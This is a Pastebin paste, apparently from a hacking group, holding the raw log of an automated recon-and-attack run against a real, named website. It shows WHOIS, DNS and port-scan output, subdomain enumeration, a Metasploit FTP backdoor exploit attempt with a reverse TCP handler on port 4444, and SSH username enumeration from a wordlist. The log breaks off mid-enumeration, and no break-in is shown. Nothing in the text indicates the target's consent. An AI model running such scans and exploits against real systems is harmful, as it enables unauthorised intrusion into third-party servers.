daily pastebin goal
63%
SHARE
TWEET

HunterUnit JTSEC full recon #2

a guest Oct 16th, 2017 1,314 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #######################################################################################################################################
  2. Hostname    www.nccuties.com        ISP     1&1 Internet SE (AS8560)
  3. Continent   North America       Flag    
  4. US
  5. Country     United States       Country Code    US (USA)
  6. Region  PA      Local time  16 Oct 2017 18:09 EDT
  7. Metropolis*     Philadelphia            Postal Code     19087
  8. City    Wayne       Latitude    40.055
  9. IP Address  216.250.120.114         Longitude   -75.408
  10. #######################################################################################################################################
  11. [i] Scanning Site: http://nccuties.com
  12.  
  13.  
  14.  
  15. B A S I C   I N F O
  16. ====================
  17.  
  18.  
  19. [+] Site Title: Welcome to NC Cuties
  20. [+] IP address: 216.250.120.114
  21. [+] Web Server: Apache
  22. [+] CMS: Could Not Detect
  23. [+] Cloudflare: Not Detected
  24. [+] Robots File: Could NOT Find robots.txt!
  25.  
  26.  
  27.  
  28.  
  29. W H O I S   L O O K U P
  30. ========================
  31.  
  32.        Domain Name: NCCUTIES.COM
  33.    Registry Domain ID: 119190526_DOMAIN_COM-VRSN
  34.    Registrar WHOIS Server: whois.godaddy.com
  35.    Registrar URL: http://www.godaddy.com
  36.    Updated Date: 2017-05-03T06:28:42Z
  37.    Creation Date: 2004-05-05T08:10:16Z
  38.    Registry Expiry Date: 2018-05-05T08:10:16Z
  39.    Registrar: GoDaddy.com, LLC
  40.    Registrar IANA ID: 146
  41.    Registrar Abuse Contact Email: abuse@godaddy.com
  42.    Registrar Abuse Contact Phone: 480-624-2505
  43.    Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
  44.    Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
  45.    Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
  46.    Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
  47.    Name Server: NS27.1AND1.COM
  48.    Name Server: NS28.1AND1.COM
  49.  
  50. G E O  I P  L O O K  U P
  51. =========================
  52.  
  53. [i] IP Address: 216.250.120.114
  54. [i] Country: US
  55. [i] State: Pennsylvania
  56. [i] City: Wayne
  57. [i] Latitude: 40.054798
  58. [i] Longitude: -75.408302
  59.  
  60.  
  61. H T T P   H E A D E R S
  62. =======================
  63.  
  64.  
  65. [i]  HTTP/1.1 200 OK
  66. [i]  Content-Type: text/html
  67. [i]  Content-Length: 26659
  68. [i]  Connection: close
  69. [i]  Date: Mon, 16 Oct 2017 22:12:43 GMT
  70. [i]  Server: Apache
  71. [i]  Last-Modified: Sun, 26 Oct 2014 18:32:10 GMT
  72. [i]  ETag: "6823-50657a1cdd0d5"
  73. [i]  Accept-Ranges: bytes
  74.  
  75. D N S   L O O K U P
  76. ===================
  77.  
  78. nccuties.com.       3588    IN  A   216.250.120.114
  79. nccuties.com.       172800  IN  NS  ns27.1and1.com.
  80. nccuties.com.       172800  IN  NS  ns28.1and1.com.
  81. nccuties.com.       86400   IN  SOA ns27.1and1.com. hostmaster.1and1.com. 2016061600 28800 7200 604800 600
  82. nccuties.com.       3600    IN  MX  10 mx00.1and1.com.
  83. nccuties.com.       3600    IN  MX  10 mx01.1and1.com.
  84.  
  85. S U B N E T   C A L C U L A T I O N
  86. ====================================
  87.  
  88. Address       = 216.250.120.114
  89. Network       = 216.250.120.114 / 32
  90. Netmask       = 255.255.255.255
  91. Broadcast     = not needed on Point-to-Point links
  92. Wildcard Mask = 0.0.0.0
  93. Hosts Bits    = 0
  94. Max. Hosts    = 1   (2^0 - 0)
  95. Host Range    = { 216.250.120.114 - 216.250.120.114 }
  96.  
  97. N M A P   P O R T   S C A N
  98. ============================
  99.  
  100.  
  101. Starting Nmap 7.01 ( https://nmap.org ) at 2017-10-16 22:12 UTC
  102. Nmap scan report for nccuties.com (216.250.120.114)
  103. Host is up (0.038s latency).
  104. rDNS record for 216.250.120.114: perfora.net
  105. PORT     STATE    SERVICE       VERSION
  106. 21/tcp   open     ftp           ProFTPD or KnFTPD
  107. 22/tcp   open     ssh           OpenSSH 6.7p1 Debian 5+deb8u1~ui80+7 (protocol 2.0)
  108. 23/tcp   filtered telnet
  109. 25/tcp   filtered smtp
  110. 80/tcp   open     http          Apache httpd
  111. 110/tcp  filtered pop3
  112. 143/tcp  filtered imap
  113. 443/tcp  open     ssl/https?
  114. 445/tcp  filtered microsoft-ds
  115. 3389/tcp filtered ms-wbt-server
  116. Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
  117.  
  118. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  119. Nmap done: 1 IP address (1 host up) scanned in 8.13 seconds
  120.  
  121. S U B - D O M A I N   F I N D E R
  122. ==================================
  123.  
  124.  
  125. [i] Total Subdomains Found : 2
  126.  
  127. [+] Subdomain: nccuties.com
  128. [-] IP: 216.250.120.114
  129.  
  130. [+] Subdomain: www.nccuties.com
  131. [-] IP: 216.250.120.114
  132. [*] Performing TLD Brute force Enumeration against nccuties.com
  133. [*] The operation could take up to: 00:01:07
  134. [*]      A nccuties.biz.af 5.45.75.45
  135. [*]      CNAME nccuties.biz.at free.biz.at
  136. [*]      A free.biz.at 216.92.134.29
  137. [*]      A nccuties.co.asia 91.195.240.135
  138. [*]      A nccuties.org.aw 142.4.20.12
  139. [*]      A nccuties.org.ax 185.55.85.123
  140. [*]      A nccuties.com.ax 185.55.85.123
  141. [*]      A nccuties.co.ba 176.9.45.78
  142. [*]      A nccuties.com.ba 195.222.33.180
  143. [*]      A nccuties.com.be 95.173.170.166
  144. [*]      A nccuties.biz.by 71.18.52.2
  145. [*]      A nccuties.biz.bz 199.59.242.150
  146. [*]      A nccuties.net.cc 54.252.89.206
  147. [*]      A nccuties.com.cc 54.252.107.64
  148. [*]      A nccuties.co.cc 175.126.123.219
  149. [*]      A nccuties.org.ch 72.52.4.122
  150. [*]      A nccuties.biz.cl 185.53.178.8
  151. [*]      A nccuties.co.cm 85.25.140.105
  152. [*]      A nccuties.net.cm 85.25.140.105
  153. [*]      A nccuties.com 216.250.120.114
  154. [*]      A nccuties.com.com 52.33.196.199
  155. [*]      A nccuties.net.com 199.59.242.150
  156. [*]      A nccuties.org.com 23.23.86.44
  157. [*]      A nccuties.co.com 173.192.115.17
  158. [*]      CNAME nccuties.biz.cm i.cns.cm
  159. [*]      A i.cns.cm 118.184.56.30
  160. [*]      A nccuties.biz.cr 72.52.4.122
  161. [*]      A nccuties.biz.cx 72.52.4.122
  162. [*]      A nccuties.net.cz 80.250.24.177
  163. [*]      A nccuties.biz.cz 185.53.179.7
  164. [*]      A nccuties.com.cz 62.109.128.30
  165. [*]      CNAME nccuties.co.de co.de
  166. [*]      A co.de 144.76.162.245
  167. [*]      A nccuties.com.de 50.56.68.37
  168. [*]      CNAME nccuties.org.de www.org.de
  169. [*]      A www.org.de 78.47.128.8
  170. [*]      A nccuties.net.eu 78.46.90.98
  171. [*]      A nccuties.org.eu 78.46.90.98
  172. [*]      A nccuties.biz.fi 185.55.85.123
  173. [*]      A nccuties.fm 173.230.131.38
  174. [*]      A nccuties.biz.fm 173.230.131.38
  175. [*]      A nccuties.org.fr 149.202.133.35
  176. [*]      A nccuties.biz.gl 72.52.4.122
  177. [*]      CNAME nccuties.co.gp co.gp
  178. [*]      A co.gp 144.76.162.245
  179. [*]      A nccuties.co.hn 208.100.40.203
  180. [*]      CNAME nccuties.net.hr net.hr
  181. [*]      A net.hr 192.0.78.25
  182. [*]      A net.hr 192.0.78.24
  183. [*]      A nccuties.co.ht 72.52.4.122
  184. [*]      CNAME nccuties.biz.hn parkmydomain.vhostgo.com
  185. [*]      CNAME parkmydomain.vhostgo.com westuser.dopa.com
  186. [*]      A westuser.dopa.com 107.186.245.119
  187. [*]      A nccuties.co.jobs 50.17.193.222
  188. [*]      A nccuties.com.jobs 50.19.241.165
  189. [*]      A nccuties.net.jobs 50.19.241.165
  190. [*]      A nccuties.org.jobs 50.19.241.165
  191. [*]      A nccuties.biz.jobs 50.19.241.165
  192. [*]      A nccuties.la 173.230.141.80
  193. [*]      CNAME nccuties.biz.li 712936.parkingcrew.net
  194. [*]      A 712936.parkingcrew.net 185.53.179.29
  195. [*]      A nccuties.biz.lu 195.26.5.2
  196. [*]      A nccuties.biz.ly 64.136.20.39
  197. [*]      A nccuties.biz.md 72.52.4.122
  198. [*]      A nccuties.co.mk 87.76.31.211
  199. [*]      A nccuties.co.mobi 54.225.105.179
  200. [*]      A nccuties.biz.my 202.190.174.44
  201. [*]      A nccuties.co.net 188.166.216.219
  202. [*]      A nccuties.net.net 52.50.81.210
  203. [*]      A nccuties.org.net 23.23.86.44
  204. [*]      A nccuties.co.nl 37.97.184.204
  205. [*]      A nccuties.com.nl 83.98.157.102
  206. [*]      A nccuties.net.nl 83.98.157.102
  207. [*]      A nccuties.co.nr 208.100.40.202
  208. [*]      CNAME nccuties.co.nu co.nu
  209. [*]      A co.nu 144.76.162.245
  210. [*]      A nccuties.org.nu 80.92.84.139
  211. [*]      CNAME nccuties.com.nu com.nu
  212. [*]      A com.nu 144.76.162.245
  213. [*]      A nccuties.net.nu 199.102.76.78
  214. [*]      A nccuties.com.org 23.23.86.44
  215. [*]      CNAME nccuties.net.org pewtrusts.org
  216. [*]      A pewtrusts.org 204.74.99.100
  217. [*]      A nccuties.ph 45.79.222.138
  218. [*]      A nccuties.com.ph 45.79.222.138
  219. [*]      A nccuties.co.ph 45.79.222.138
  220. [*]      A nccuties.net.ph 45.79.222.138
  221. [*]      A nccuties.org.ph 45.79.222.138
  222. [*]      A nccuties.co.pl 212.91.6.55
  223. [*]      A nccuties.org.pm 208.73.210.217
  224. [*]      A nccuties.org.pm 208.73.211.165
  225. [*]      A nccuties.org.pm 208.73.211.177
  226. [*]      A nccuties.org.pm 208.73.210.202
  227. [*]      CNAME nccuties.biz.ps biz.ps
  228. [*]      A biz.ps 144.76.162.245
  229. [*]      A nccuties.co.pt 194.107.127.52
  230. [*]      A nccuties.co.ps 66.96.132.56
  231. [*]      A nccuties.pw 141.8.226.58
  232. [*]      A nccuties.co.pw 141.8.226.59
  233. [*]      A nccuties.net.pw 141.8.226.59
  234. [*]      A nccuties.biz.pw 141.8.226.59
  235. [*]      A nccuties.org.pw 141.8.226.59
  236. [*]      A nccuties.net.ro 69.64.52.127
  237. [*]      CNAME nccuties.co.ro now.co.ro
  238. [*]      A now.co.ro 185.27.255.9
  239. [*]      A nccuties.org.re 217.70.184.38
  240. [*]      A nccuties.com.ru 178.210.89.119
  241. [*]      A nccuties.biz.se 185.53.179.6
  242. [*]      CNAME nccuties.net.se 773147.parkingcrew.net
  243. [*]      A 773147.parkingcrew.net 185.53.179.29
  244. [*]      A nccuties.co.sl 91.195.240.135
  245. [*]      A nccuties.com.sr 143.95.106.249
  246. [*]      A nccuties.biz.st 91.121.28.115
  247. [*]      A nccuties.co.su 72.52.4.122
  248. [*]      A nccuties.biz.tc 64.136.20.39
  249. [*]      A nccuties.biz.tf 85.236.153.18
  250. [*]      A nccuties.net.tf 188.40.70.27
  251. [*]      A nccuties.net.tf 188.40.70.29
  252. [*]      A nccuties.net.tf 188.40.117.12
  253. [*]      A nccuties.co.tl 208.100.40.202
  254. [*]      A nccuties.co.to 175.118.124.44
  255. [*]      A nccuties.co.tv 31.186.25.163
  256. [*]      A nccuties.biz.tv 72.52.4.122
  257. [*]      A nccuties.org.tv 72.52.4.122
  258. [*]      CNAME nccuties.biz.uz biz.uz
  259. [*]      A biz.uz 144.76.162.245
  260. [*]      A nccuties.vg 88.198.29.97
  261. [*]      A nccuties.co.vg 88.198.29.97
  262. [*]      A nccuties.com.vg 88.198.29.97
  263. [*]      A nccuties.net.vg 166.62.28.147
  264. [*]      A nccuties.biz.vg 89.31.143.20
  265. [*]      A nccuties.ws 64.70.19.203
  266. [*]      A nccuties.net.ws 202.4.48.211
  267. [*]      A nccuties.com.ws 202.4.48.211
  268. [*]      A nccuties.biz.ws 184.168.221.104
  269. [*]      A nccuties.org.ws 202.4.48.211
  270.  
  271. NetRange:       216.250.112.0 - 216.250.127.255
  272. CIDR:           216.250.112.0/20
  273. NetName:        1AN1-NETWORK
  274. NetHandle:      NET-216-250-112-0-1
  275. Parent:         NET216 (NET-216-0-0-0-0)
  276. NetType:        Direct Allocation
  277. OriginAS:       AS8560
  278. Organization:   1&1 Internet Inc. (11INT)
  279. RegDate:        2011-08-01
  280. Updated:        2011-08-01
  281. Comment:        For abuse issues, please use only abuse@1and1.com
  282. Ref:            https://whois.arin.net/rest/net/NET-216-250-112-0-1
  283.  
  284.  
  285. OrgName:        1&1 Internet Inc.
  286. OrgId:          11INT
  287. Address:        701 Lee Rd
  288. Address:        Suite 300
  289. City:           Chesterbrook
  290. StateProv:      PA
  291. PostalCode:     19087
  292. Country:        US
  293. RegDate:        2006-09-05
  294. Updated:        2017-08-09
  295. Comment:        http://www.1and1.com
  296. Comment:        For abuse issues, please use only abuse@1and1.com
  297. Ref:            https://whois.arin.net/rest/org/11INT
  298.  
  299.  
  300. OrgNOCHandle: 1NOC-ARIN
  301. OrgNOCName:   1and1 Network Operations Center
  302. OrgNOCPhone:  +49-721-91374-8560
  303. OrgNOCEmail:  noc@oneandone.net
  304. OrgNOCRef:    https://whois.arin.net/rest/poc/1NOC-ARIN
  305.  
  306. OrgAbuseHandle: 1AD-ARIN
  307. OrgAbuseName:   1and1 Abuse Department
  308. OrgAbusePhone:  +1-877-206-4253
  309. OrgAbuseEmail:  abuse@1and1.com
  310. OrgAbuseRef:    https://whois.arin.net/rest/poc/1AD-ARIN
  311.  
  312. OrgTechHandle: 1NO-ARIN
  313. OrgTechName:   1and1 ARIN Role
  314. OrgTechPhone:  +1-913-433-7549
  315. OrgTechEmail:  arin-role@oneandone.net
  316. OrgTechRef:    https://whois.arin.net/rest/poc/1NO-ARIN
  317.  
  318. RAbuseHandle: 1AD-ARIN
  319. RAbuseName:   1and1 Abuse Department
  320. RAbusePhone:  +1-877-206-4253
  321. RAbuseEmail:  abuse@1and1.com
  322. RAbuseRef:    https://whois.arin.net/rest/poc/1AD-ARIN
  323.  
  324. #[92m + -- ----------------------------=[Running Nslookup]=------------------------ -- +
  325. Server:     192.168.1.254
  326. Address:    192.168.1.254#53
  327.  
  328. Non-authoritative answer:
  329. Name:   nccuties.com
  330. Address: 216.250.120.114
  331.  
  332. nccuties.com has address 216.250.120.114
  333. nccuties.com mail is handled by 10 mx00.1and1.com.
  334. nccuties.com mail is handled by 10 mx01.1and1.com.
  335.  + -- ----------------------------=[Checking OS Fingerprint]=----------------- -- +
  336.  
  337. Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
  338.  
  339. [+] Target is nccuties.com
  340. [+] Loading modules.
  341. [+] Following modules are loaded:
  342. [x] [1] ping:icmp_ping  -  ICMP echo discovery module
  343. [x] [2] ping:tcp_ping  -  TCP-based ping discovery module
  344. [x] [3] ping:udp_ping  -  UDP-based ping discovery module
  345. [x] [4] infogather:ttl_calc  -  TCP and UDP based TTL distance calculation
  346. [x] [5] infogather:portscan  -  TCP and UDP PortScanner
  347. [x] [6] fingerprint:icmp_echo  -  ICMP Echo request fingerprinting module
  348. [x] [7] fingerprint:icmp_tstamp  -  ICMP Timestamp request fingerprinting module
  349. [x] [8] fingerprint:icmp_amask  -  ICMP Address mask request fingerprinting module
  350. [x] [9] fingerprint:icmp_port_unreach  -  ICMP port unreachable fingerprinting module
  351. [x] [10] fingerprint:tcp_hshake  -  TCP Handshake fingerprinting module
  352. [x] [11] fingerprint:tcp_rst  -  TCP RST fingerprinting module
  353. [x] [12] fingerprint:smb  -  SMB fingerprinting module
  354. [x] [13] fingerprint:snmp  -  SNMPv2c fingerprinting module
  355. [+] 13 modules registered
  356. [+] Initializing scan engine
  357. [+] Running scan engine
  358. [-] ping:tcp_ping module: no closed/open TCP ports known on 216.250.120.114. Module test failed
  359. [-] ping:udp_ping module: no closed/open UDP ports known on 216.250.120.114. Module test failed
  360. [-] No distance calculation. 216.250.120.114 appears to be dead or no ports known
  361. [+] Host: 216.250.120.114 is up (Guess probability: 50%)
  362. [+] Target: 216.250.120.114 is alive. Round-Trip Time: 0.49560 sec
  363. [+] Selected safe Round-Trip Time value is: 0.99119 sec
  364. [-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
  365. [-] fingerprint:smb need either TCP port 139 or 445 to run
  366. [+] Primary guess:
  367. [+] Host 216.250.120.114 Running OS:  (Guess probability: 100%)
  368. [+] Other guesses:
  369. [+] Host 216.250.120.114 Running OS:  (Guess probability: 100%)
  370. [+] Host 216.250.120.114 Running OS:  (Guess probability: 100%)
  371. [+] Host 216.250.120.114 Running OS:  (Guess probability: 100%)
  372. [+] Host 216.250.120.114 Running OS:  (Guess probability: 100%)
  373. [+] Host 216.250.120.114 Running OS:  (Guess probability: 100%)
  374. [+] Host 216.250.120.114 Running OS:  (Guess probability: 100%)
  375. [+] Host 216.250.120.114 Running OS:  (Guess probability: 100%)
  376. [+] Host 216.250.120.114 Running OS:  (Guess probability: 100%)
  377. [+] Host 216.250.120.114 Running OS:  (Guess probability: 100%)
  378. [+] Cleaning up scan engine
  379. [+] Modules deinitialized
  380. [+] Execution completed.
  381.  + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +
  382.    Domain Name: NCCUTIES.COM
  383.    Registry Domain ID: 119190526_DOMAIN_COM-VRSN
  384.    Registrar WHOIS Server: whois.godaddy.com
  385.    Registrar URL: http://www.godaddy.com
  386.    Updated Date: 2017-05-03T06:28:42Z
  387.    Creation Date: 2004-05-05T08:10:16Z
  388.    Registry Expiry Date: 2018-05-05T08:10:16Z
  389.    Registrar: GoDaddy.com, LLC
  390.    Registrar IANA ID: 146
  391.    Registrar Abuse Contact Email: abuse@godaddy.com
  392.    Registrar Abuse Contact Phone: 480-624-2505
  393.    Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
  394.    Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
  395.    Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
  396.    Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
  397.    Name Server: NS27.1AND1.COM
  398.    Name Server: NS28.1AND1.COM
  399.    DNSSEC: unsigned
  400.  
  401. The Registry database contains ONLY .COM, .NET, .EDU domains and
  402. Registrars.
  403. Domain Name: NCCUTIES.COM
  404. Registrar URL: http://www.godaddy.com
  405. Registrant Name: Registration Private
  406. Registrant Organization: Domains By Proxy, LLC
  407. Name Server: NS27.1AND1.COM
  408. Name Server: NS28.1AND1.COM
  409. DNSSEC: unsigned
  410.  
  411. For complete domain details go to:
  412. http://who.godaddy.com/whoischeck.aspx?domain=NCCUTIES.COM
  413.  
  414. The data contained in GoDaddy.com, LLC's WhoIs database,
  415. while believed by the company to be reliable, is provided "as is"
  416. with no guarantee or warranties regarding its accuracy.  This
  417. information is provided for the sole purpose of assisting you
  418. in obtaining information about domain name registration records.
  419. Any use of this data for any other purpose is expressly forbidden without the prior written
  420. permission of GoDaddy.com, LLC.  By submitting an inquiry,
  421. you agree to these terms of usage and limitations of warranty.  In particular,
  422. you agree not to use this data to allow, enable, or otherwise make possible,
  423. dissemination or collection of this data, in part or in its entirety, for any
  424. purpose, such as the transmission of unsolicited advertising and
  425. and solicitations of any kind, including spam.  You further agree
  426. not to use this data to enable high volume, automated or robotic electronic
  427. processes designed to collect or compile this data for any purpose,
  428. including mining this data for your own personal or commercial purposes.
  429.  
  430. Please note: the registrant of the domain name is specified
  431. in the "registrant" section.  In most cases, GoDaddy.com, LLC
  432. is not the registrant of domain names listed in this database.
  433.  + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +
  434.  
  435.  
  436. [+] Hosts found in search engines:
  437. ------------------------------------
  438. [-] Resolving hostnames IPs...
  439. 216.250.120.114:www.nccuties.com
  440.  + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +
  441.  
  442. ; <<>> DiG 9.10.3-P4-Debian <<>> -x nccuties.com
  443. ;; global options: +cmd
  444. ;; Got answer:
  445. ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 27746
  446. ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
  447.  
  448. ;; OPT PSEUDOSECTION:
  449. ; EDNS: version: 0, flags:; udp: 4096
  450. ;; QUESTION SECTION:
  451. ;com.nccuties.in-addr.arpa. IN  PTR
  452.  
  453. ;; AUTHORITY SECTION:
  454. in-addr.arpa.       3600    IN  SOA b.in-addr-servers.arpa. nstld.iana.org. 2017043288 1800 900 604800 3600
  455.  
  456. ;; Query time: 164 msec
  457. ;; SERVER: 192.168.1.254#53(192.168.1.254)
  458. ;; WHEN: Mon Oct 16 18:12:22 EDT 2017
  459. ;; MSG SIZE  rcvd: 122
  460.  
  461. dnsenum VERSION:1.2.4
  462. 
  463. -----   nccuties.com   -----
  464. 
  465.  
  466. Host's addresses:
  467. __________________
  468.  
  469. nccuties.com.                            3573     IN    A        216.250.120.114
  470. 
  471.  
  472. Name Servers:
  473. ______________
  474.  
  475. ns27.1and1.com.                          166187   IN    A        217.160.82.147
  476. ns28.1and1.com.                          166187   IN    A        217.160.83.147
  477. 
  478.  
  479. Mail (MX) Servers:
  480. ___________________
  481.  
  482. mx01.1and1.com.                          316      IN    A        74.208.5.21
  483. mx00.1and1.com.                          7200     IN    A        74.208.5.3
  484. 
  485.  
  486. Trying Zone Transfers and getting Bind Versions:
  487. _________________________________________________
  488.  
  489. 
  490. Trying Zone Transfer for nccuties.com on ns27.1and1.com ...
  491.  
  492. Trying Zone Transfer for nccuties.com on ns28.1and1.com ...
  493.  
  494. brute force file not specified, bay.
  495.  + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +
  496. 
  497.                  ____        _     _ _     _   _____
  498.                 / ___| _   _| |__ | (_)___| |_|___ / _ __
  499.                 \___ \| | | | '_ \| | / __| __| |_ \| '__|
  500.                  ___) | |_| | |_) | | \__ \ |_ ___) | |
  501.                 |____/ \__,_|_.__/|_|_|___/\__|____/|_|
  502.  
  503.                 # Coded By Ahmed Aboul-Ela - @aboul3la
  504.    
  505. [-] Enumerating subdomains now for nccuties.com
  506. [-] verbosity is enabled, will show the subdomains results in realtime
  507. [-] Searching now in Baidu..
  508. [-] Searching now in Yahoo..
  509. [-] Searching now in Google..
  510. [-] Searching now in Bing..
  511. [-] Searching now in Ask..
  512. [-] Searching now in Netcraft..
  513. [-] Searching now in DNSdumpster..
  514. [-] Searching now in Virustotal..
  515. [-] Searching now in ThreatCrowd..
  516. [-] Searching now in SSL Certificates..
  517. [-] Searching now in PassiveDNS..
  518. Virustotal: www.nccuties.com
  519. DNSdumpster: www.nccuties.com
  520. [-] Saving results to file: /usr/share/sniper/loot/domains/domains-nccuties.com.txt
  521. [-] Total Unique Subdomains Found: 1
  522. www.nccuties.com
  523.  ╔═╗╦═╗╔╦╗╔═╗╦ ╦
  524.  ║  ╠╦╝ ║ ╚═╗╠═╣
  525.  ╚═╝╩╚═ ╩o╚═╝╩ ╩
  526.  + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +
  527. 
  528.  [+] Domains saved to: /usr/share/sniper/loot/domains/domains-nccuties.com-full.txt
  529. 
  530.  + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +
  531.  + -- ----------------------------=[Checking Email Security]=----------------- -- +
  532.  
  533.  + -- ----------------------------=[Pinging host]=---------------------------- -- +
  534. PING nccuties.com (216.250.120.114) 56(84) bytes of data.
  535. 64 bytes from perfora.net (216.250.120.114): icmp_seq=1 ttl=53 time=217 ms
  536.  
  537. --- nccuties.com ping statistics ---
  538. 1 packets transmitted, 1 received, 0% packet loss, time 0ms
  539. rtt min/avg/max/mdev = 217.968/217.968/217.968/0.000 ms
  540.  
  541.  + -- ----------------------------=[Running TCP port scan]=------------------- -- +
  542.  
  543. Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-16 18:12 EDT
  544. Nmap scan report for nccuties.com (216.250.120.114)
  545. Host is up (0.40s latency).
  546. rDNS record for 216.250.120.114: perfora.net
  547. Not shown: 44 filtered ports, 1 closed port
  548. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  549. PORT    STATE SERVICE
  550. 21/tcp  open  ftp
  551. 22/tcp  open  ssh
  552. 80/tcp  open  http
  553. 443/tcp open  https
  554.  
  555. Nmap done: 1 IP address (1 host up) scanned in 4.68 seconds
  556.  
  557.  + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +
  558.  + -- --=[Port 21 opened... running tests...
  559.  
  560. Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-16 18:12 EDT
  561. Nmap scan report for nccuties.com (216.250.120.114)
  562. Host is up (0.22s latency).
  563. rDNS record for 216.250.120.114: perfora.net
  564. Skipping host nccuties.com (216.250.120.114) due to host timeout
  565. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  566. Nmap done: 1 IP address (1 host up) scanned in 915.99 seconds
  567. 
  568.  
  569. RHOST => nccuties.com
  570. RHOSTS => nccuties.com
  571. [*] nccuties.com:21 - Banner: 220 FTP Server ready.
  572. [*] nccuties.com:21 - USER: 331 Password required for Yj:)
  573. [*] Exploit completed, but no session was created.
  574. [*] Started reverse TCP double handler on 10.13.4.62:4444
  575. [*] nccuties.com:21 - Sending Backdoor Command
  576. [-] nccuties.com:21 - Not backdoored
  577. [*] Exploit completed, but no session was created.
  578.  + -- --=[Port 22 opened... running tests...
  579. [exception] cannot connect to nccuties.com port 22: timed out
  580.  
  581. Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-16 18:28 EDT
  582. Nmap scan report for nccuties.com (216.250.120.114)
  583. Host is up (0.036s latency).
  584. rDNS record for 216.250.120.114: perfora.net
  585.  
  586. PORT   STATE    SERVICE VERSION
  587. 22/tcp filtered ssh
  588. Too many fingerprints match this host to give specific OS details
  589. Network Distance: 11 hops
  590.  
  591. TRACEROUTE (using proto 1/icmp)
  592. HOP RTT       ADDRESS
  593. 1   110.27 ms 10.13.0.1
  594. 2   ...
  595. 3   110.31 ms po101.gra-g2-a75.fr.eu (178.33.103.231)
  596. 4   112.06 ms 10.95.33.10
  597. 5   113.80 ms be100-1111.ldn-5-a9.uk.eu (213.251.128.65)
  598. 6   181.84 ms be100-1298.nwk-5-a9.nj.us (192.99.146.133)
  599. 7   248.81 ms 192.99.146.138
  600. 8   205.84 ms be100-1324.chi-5-a9.il.us (192.99.146.141)
  601. 9   205.35 ms equinix.bb-b.cr.chi.us.oneandone.net (206.223.119.24)
  602. 10  217.38 ms ae-6-0.bb-a.ga.mkc.us.oneandone.net (74.208.6.124)
  603. 11  217.55 ms perfora.net (216.250.120.114)
  604.  
  605. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  606. Nmap done: 1 IP address (1 host up) scanned in 12.24 seconds
  607. 
  608. Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f
  609. EFLAGS: 00010046
  610. eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001
  611. esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60
  612. ds: 0018   es: 0018  ss: 0018
  613. Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)
  614.  
  615. 
  616. Stack: 90909090990909090990909090
  617.        90909090990909090990909090
  618.        90909090.90909090.90909090
  619.        90909090.90909090.90909090
  620.        90909090.90909090.09090900
  621.        90909090.90909090.09090900
  622.        ..........................
  623.        cccccccccccccccccccccccccc
  624.        cccccccccccccccccccccccccc
  625.        ccccccccc.................
  626.        cccccccccccccccccccccccccc
  627.        cccccccccccccccccccccccccc
  628.        .................ccccccccc
  629.        cccccccccccccccccccccccccc
  630.        cccccccccccccccccccccccccc
  631.        ..........................
  632.        ffffffffffffffffffffffffff
  633.        ffffffff..................
  634.        ffffffffffffffffffffffffff
  635.        ffffffff..................
  636.        ffffffff..................
  637.        ffffffff..................
  638. 
  639.  
  640. Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00
  641. Aiee, Killing Interrupt handler
  642. Kernel panic: Attempted to kill the idle task!
  643. In swapper task - not syncing
  644. 
  645.  
  646.        =[ metasploit v4.16.10-dev                         ]
  647. + -- --=[ 1687 exploits - 966 auxiliary - 299 post        ]
  648. + -- --=[ 499 payloads - 40 encoders - 10 nops            ]
  649. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  650.  
  651. USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
  652. RHOSTS => nccuties.com
  653. [!] RHOST is not a valid option for this module. Did you mean RHOSTS?
  654. RHOST => nccuties.com
  655. [*] 216.250.120.114:22 - SSH - Checking for false positives
  656. [*] 216.250.120.114:22 - SSH - Starting scan
  657. [-] 216.250.120.114:22 - SSH - User 'admin' not found
  658. [-] 216.250.120.114:22 - SSH - User 'administrator' not found
  659. [-] 216.250.120.114:22 - SSH - User 'anonymous' not found
  660. [-] 216.250.120.114:22 - SSH - User 'backup' not found
  661. [-] 216.250.120.114:22 - SSH - User 'bee' not found
  662. [-] 216.250.120.114:22 - SSH - User 'ftp' not found
  663. [-] 216.250.120.114:22 - SSH - User 'guest' not found
  664. [-] 216.250.120.114:22 - SSH - User 'GUEST' not found
  665. [-] 216.250.120.114:22 - SSH - User 'info' on could not connect
  666. [-] 216.250.120.114:22 - SSH - User 'mail' on could not connect
  667. [-] 216.250.120.114:22 - SSH - User 'mailadmin' not found
  668. [-] 216.250.120.114:22 - SSH - User 'msfadmin' on could not connect
